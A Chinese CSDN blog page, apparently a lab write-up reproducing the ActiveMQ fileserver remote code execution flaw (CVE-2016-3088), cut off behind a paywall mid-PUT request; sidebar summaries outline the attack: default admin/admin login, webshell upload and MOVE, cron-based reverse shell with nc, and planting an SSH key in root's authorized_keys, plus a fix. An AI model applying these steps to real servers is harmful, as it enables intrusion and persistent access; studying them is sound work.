activemq 远程代码执行 (CVE-2016-3088)

已于 2022-03-31 14:06:12 修改
阅读量547 收藏
点赞数
分类专栏: 漏洞复现 文章标签: php 服务器
于 2022-03-31 10:40:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_32445755/article/details/123864165
版权

简介

ActiveMQ 是 Apache 软件基金会下的一个开源消息驱动中间件软件。Jetty 是一个开源的 servlet 容器,它为基于 Java 的 web 容器,例如 JSP 和 servlet 提供运行环境。ActiveMQ 5.0 及以后版本默认集成了 jetty。Apache ActiveMQ Fileserver 存在多个安全漏洞,可使远程攻击者用恶意代码替代 Web 应用,在受影响系统上执行远程代码,请拿到 flag,默认在/tmp/目录中。提示:该漏洞一句话木马无法执行,请利用命令执行小马。

复现

写 shell 的话,需要写在 admin 或者 api 中,也就是需要登录,没有密码的话完成不了写 shell 操作。

该环境默认的口令为 admin/admin。

访问 http://ip:8161/admin/test/systemProperties.jsp

获得当前系统的路径

 

put发包上传

PUT /fileserver/2.txt HTTP/1.1
Host: 192.168.13.132:8161
Accept: /
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Tri
了解本专栏 订阅专栏 解锁全文 超级会员免费看
qq_1136014935
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
apache-activemq-5.16.5-bin.tar.gz 下载(5积分)
08-17
Apache ActiveMQ是Apache软件基金会的一个开源项目,是一个基于消息的通信中间件。ActiveMQ是JMS的一个具体实现,支持JMS的两种消息模型。ActiveMQ使用AMQP协议集成多平台应用,使用STOMP协议通过websockets在Web...
Apache ActiveMQ 远程代码执行漏洞CVE-2016-3088)复现及排查
dayouzi的博客
08-14 2309
ActiveMQ的web控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口;admin和api都需要登录后才能使用,fileserver无需登录。所以,ActiveMQ在5.12.x~5.13.x版本中,已经默认关闭了fileserver这个应用(你可以在conf/jetty.xml中开启之);在5.14.0版本以后,彻底删除了fileserver应用。
Apache ActiveMQ 远程代码执行漏洞复现(CVE-2016-3088)
又菜又爱倒腾的博客
10-29 1743
#Apache ActiveMQ 远程代码执行漏洞(CVE-2016-3088)# 一、漏洞简介 ActiveMQ 是 Apache 软件基金会下的一个开源消息驱动中间件软件。Jetty 是一个开源的 servlet 容器,它为基于 Java 的 web 容器,例如 JSP 和 servlet 提供运行环境。ActiveMQ 5.0 及以后版本默认集成了jetty。在启动后提供一个监控 ActiveMQ 的 Web 应用。 2016年4月14日,国外安全研究人员 Simon Zuckerbraun 曝光 A
ActiveMQ远程代码执行漏洞(CVE-2016-3088)
weixin_44047654的博客
11-25 3009
ActiveMQ远程代码执行漏洞(CVE-2016-3088)
ActiveMQ远程代码执行漏洞复现 (CVE-2016-3088)
m0_49025459的博客
10-20 241
这里复现的靶场使用的是vulhub搭建的,过多的我就不赘述了,直接启动靶场,启动正确我们访问IP(靶场IP):8161这里以192.168.218.132:8161为例,如果出现下图场景,则证明靶场搭建成功。
Apache ActiveMQ 远程代码执行漏洞CVE-2016-3088)复现
m0_69994768的博客
01-23 1133
Apache ActiveMQ 远程代码执行漏洞CVE-2016-3088
Apache ActiveMQ 远程代码执行漏洞 (CVE-2016-3088)复现
chenming08的博客
04-27 804
4、进入ActiveMQ :http://your-ip:8161/admin/test/systemProperties.jsp(攻击机)7、然后将上传的webshell移到/opt/activemq/webapps/api/1.jsp。10、使用命令执行http://X.X.X.X:8161/api/1.jsp?1、进入环境cd activemq/CVE-2016-3088/(靶机)上传webshell到/fileserver/1.txt(攻击机)6、查看/fileserver/1.txt。
【Apache ActiveMQ 远程代码执行漏洞复现(CVE-2023-46604)】
一纸荒芜的博客
04-26 2047
近期在漏洞扫描时发现服务器存在CVE-2023-46604漏洞,故做一下漏洞复现记录。
activemq-cpp-library-3.9.5 编译的windows库文件,支持vs2015、vs2017
07-21
ActiveMQ-CPP Library 3.9.5在Windows环境下的编译与应用》 ActiveMQ-CPP Library 3.9.5是一款专为C++开发者设计的、用于与Apache ActiveMQ集成的库,它提供了丰富的API接口,使得在C++环境中能够方便地发送和...
activemq-artemis-dynatrace-plugin:ActiveMQ Artemis经纪人流程的自定义Dynatrace JMX插件
05-03
Dynatrace的ActiveMQ Artemis插件关于经纪人流程的自定义 插件。Artemis概述插件该插件提供常规的代理统计信息,例如地址内存使用率,连接/用户数,总消息数,总消息添加/确认率。 Artemis Queues插件这提供了详细的...
ActiveMQ 反序列化漏洞CVE-2015-5254)利用工具
08-15
CVE-2015-5254的严重性在于,攻击者不需要拥有系统的任何权限,仅通过网络发送恶意消息就可能导致远程代码执行。 这个漏洞主要影响ActiveMQ 5.9.x至5.13.3版本。为了利用这个漏洞,攻击者需要向受害者的ActiveMQ...
apache-activemq-5.16.6-bin.zip
12-26
这个"apache-activemq-5.16.6-bin.zip"文件包含了ActiveMQ的最新稳定版本5.16.6的二进制发行版,主要用于在各种环境中部署和运行。 **Apache ActiveMQ核心概念** 1. **消息队列(Message Queue)**: 消息队列是...
基于PHP+MySQL组合开发的微信活动投票小程序源码系统 带完整的安装代码包以及搭建部署教程
codeji的博客
07-31 342
为了满足这一需求,我们推出了一款基于PHP+MySQL组合开发的微信活动投票小程序源码系统,旨在帮助用户快速搭建和管理投票活动。该系统采用了PHP作为后端开发语言,结合MySQL数据库进行数据存储和管理,确保了系统的稳定性和可扩展性。同时,通过优化数据库查询和索引设计,提高了数据处理的效率,确保了在大量用户同时参与投票时系统的稳定运行。同时,系统还支持多种交互方式,如分享、评论等,增强了用户的参与感和互动性。同时,管理员可以自定义投票选项、设定投票时间、限制投票次数等,确保活动的灵活性和公平性。
[图解]SysML建模电磁轨道炮-01块定义图
最新发布
rolt的专栏
08-04 797
它这个轨道炮领域跟这两个Actor
深入探索:使用PHP开发保利威Polyv云点播服务器API对接实践(一)(点播服务器 API、视频加密、跑马灯防录屏、自定义用户)
漏刻有时数据可视化大屏(PHP&ECHARTS智能化开源软件系统)
08-01 596
屏幕录像是最难防范的一种视频盗版方式,保利威播放器提供的防录屏跑马灯功能,通过设定文字内容(一般是观众的身份ID信息)在视频上不规则滚动,以此来警示盗版者,达到视频版权保护的效果。另外在用户网站中,除了通过登录信息(cookies)验证观众是否有权限访问视频播放页面外,还可以通过保利威播放器验证观众是否有播放某一个视频的权限,从而实现对观众权限的双重验证。保利威接口请求方式,包含post和get两种方式,因此,需要做好两种请求方式的封装函数。
xss漏洞(二,xss靶场搭建以及简单利用)
2302_80280669的博客
08-02 354
使用工具:PHP study,dvwa靶场。
[RoarCTF 2019]Easy Calc1
kw741951的博客
07-31 304
由于页面中无法上传num,则输入 num,在num前加入一个空格可以让num变得可以上传,而且在进行代码解析时,php会把前面的空格去除。由于不能使用很多的字符,可以使用file_get_contents()函数,将ascii码转化为字符来绕过。num=var_dump(scandir(chr(47)))看到源代码有 calc.php,构造url打开。scandair可以列出指定路径中的文件目录。看到php审计代码
vulhub:Apache解析漏洞apache_parsing
weixin_68416970的博客
08-01 505
vulhub漏洞复现:Apache解析漏洞apache_parsing
CVE-2016-3088
07-27
CVE-2016-3088是指ActiveMQ中的一个安全漏洞。根据引用\[1\]提供的信息,该漏洞可以导致远程命令执行。攻击者可以通过上传恶意的JSP文件并执行命令来利用此漏洞。具体的攻击步骤如下: 1. 下载vulhub中对应环境的docker-compose.yml文件,该文件包含了漏洞环境的配置信息。\[2\] 2. 将上传的文件移动到能够执行JSP文件的文件夹中,并访问目标文件以获取命令执行后返回的数据。\[3\] 3. 使用计划任务反弹的方式,对目标服务器进行PUT上传文件操作,将恶意文件上传到目标服务器。需要注意将写入文件的换行符改为0a(Linux中的换行符)。 4. 对目标文件进行MOVE协议操作,将文件移动到/etc/cron.d目录下。 5. 使用nc命令进行端口监听,等待回显即可获取命令执行的结果。 此外,还可以通过上传SSH公钥的方式,使用ssh密钥链接进入服务器内部。具体步骤如下: 1. 使用ssh-keygen命令生成密钥对,并找到生成好的公钥id_rsa.pub。 2. 上传公钥文件,并将其移动到/root/.ssh目录下,并重命名为authorized_keys。 3. 使用ssh密钥链接进入服务器内部。 为修复CVE-2016-3088漏洞,建议将ActiveMQ升级到5.14版本或更高版本。在5.14版本后,取消了fileserver应用,可以通过改写配置文件来解决该漏洞。具体操作是修改ActiveMQ根目录下conf目录下的jetty.xml文件,对fileserver行进行注释操作。\[4\] #### 引用[.reference_title] - *1* *2* [ActiveMQ远程代码执行漏洞(CVE-2016-3088)](https://blog.csdn.net/weixin_44047654/article/details/128033455)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [CVE-2016-3088](https://blog.csdn.net/weixin_52084568/article/details/129194108)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

qq_1136014935

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值